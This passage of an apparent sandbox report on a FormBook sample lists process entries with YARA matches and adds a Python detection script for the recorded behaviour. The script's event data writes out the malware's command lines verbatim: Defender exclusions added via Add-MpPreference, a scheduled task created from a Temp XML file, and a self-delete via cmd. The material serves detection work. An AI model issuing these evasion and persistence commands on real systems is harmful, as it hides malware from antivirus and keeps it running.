                                                  Commandline:
                                                  Imagebase:0x7ff693d90000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:02:03
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\mstsc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                  Imagebase:0xc70000
                                                  File size:3444224 bytes
                                                  MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Start time:18:02:08
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
                                                  Imagebase:0xa0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:18:02:09
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
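The process list above records the full chain in command lines alone: two Defender exclusions added through powershell.exe Add-MpPreference (one for the dropped copy under AppData\Roaming), a scheduled task created from an XML file in the user's Temp directory, a second instance of Ms5nQdSz5l.exe that the sandbox now classifies as native code rather than .NET (the hollowed image), and finally cmd.exe deleting the original sample. The rules below are an added example for this report, not Joe Sandbox code; EVENTS is built from the Start time, Path and Commandline fields above with the quotes kept as the report renders them. The page's process list carries no parent/child links, so the rules use command lines and event order only, and the rule names are this example's own.

```python
"""Detection rules over the process command lines recorded in the System Behavior section.

Added example for this report, not Joe Sandbox code.  EVENTS is built from the
process entries above; no parent/child links are assumed because the list does
not carry them.  Rule names and the Temp-path heuristic are this example's own.
"""
import re

EVENTS = [
    {"time": "18:00:56", "image": r"C:\Users\user\Desktop\Ms5nQdSz5l.exe",
     "cmdline": r"'C:\Users\user\Desktop\Ms5nQdSz5l.exe'"},
    {"time": "18:01:00", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'"},
    {"time": "18:01:01", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'"},
    {"time": "18:01:01", "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'"},
    {"time": "18:01:02", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'"},
    {"time": "18:01:03", "image": r"C:\Users\user\Desktop\Ms5nQdSz5l.exe",
     "cmdline": r"C:\Users\user\Desktop\Ms5nQdSz5l.exe"},
    {"time": "18:02:03", "image": r"C:\Windows\SysWOW64\mstsc.exe",
     "cmdline": r"C:\Windows\SysWOW64\mstsc.exe"},
    {"time": "18:02:08", "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'"},
]

TOKEN_RE = re.compile(r"""'[^']*'|"[^"]*"|\S+""")

def tokenize(cmdline: str) -> list:
    """Split on whitespace, keeping quoted paths whole, then drop the quotes."""
    return [t.strip("'\"") for t in TOKEN_RE.findall(cmdline)]

def rule_defender_exclusion(ev: dict, seen_images: set):
    """powershell.exe Add-MpPreference -Exclusion*: carving the payload out of Defender's view."""
    low = [t.lower() for t in tokenize(ev["cmdline"])]
    if (ev["image"].lower().endswith("powershell.exe") and "add-mppreference" in low
            and any(t.startswith("-exclusion") for t in low)):
        return "defender_exclusion"
    return None

def rule_schtasks_xml_from_temp(ev: dict, seen_images: set):
    """schtasks /Create /XML with the task definition read from a Temp directory."""
    low = [t.lower() for t in tokenize(ev["cmdline"])]
    if ev["image"].lower().endswith("schtasks.exe") and "/create" in low and "/xml" in low:
        i = low.index("/xml")
        xml_path = low[i + 1] if i + 1 < len(low) else ""
        if "\\temp\\" in xml_path:
            return "schtasks_xml_from_temp"
    return None

def rule_self_delete(ev: dict, seen_images: set):
    """cmd /c del of a path that was the image of an earlier process in this trace."""
    low = [t.lower() for t in tokenize(ev["cmdline"])]
    if ev["image"].lower().endswith("cmd.exe") and "/c" in low and "del" in low:
        i = low.index("del")
        target = low[i + 1] if i + 1 < len(low) else ""
        if target in seen_images:
            return "self_delete"
    return None

RULES = (rule_defender_exclusion, rule_schtasks_xml_from_temp, rule_self_delete)

def run_rules(events: list) -> list:
    """Return (rule, time, image) for every event/rule match, in trace order."""
    hits, seen_images = [], set()
    for ev in events:
        for rule in RULES:
            name = rule(ev, seen_images)
            if name:
                hits.append((name, ev["time"], ev["image"]))
        seen_images.add(ev["image"].lower())
    return hits

if __name__ == "__main__":
    for name, time, image in run_rules(EVENTS):
        print(f"{time} {name:24} {image}")
```

Against real process-creation telemetry the command lines carry double quotes and the image path comes from the event itself; the tokenizer accepts both quote styles so the rules transfer unchanged. The self-delete rule keys on the earlier image path rather than on the parent, which keeps it working when the deleting cmd.exe is spawned from a hollowed or injected process, as it is here.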
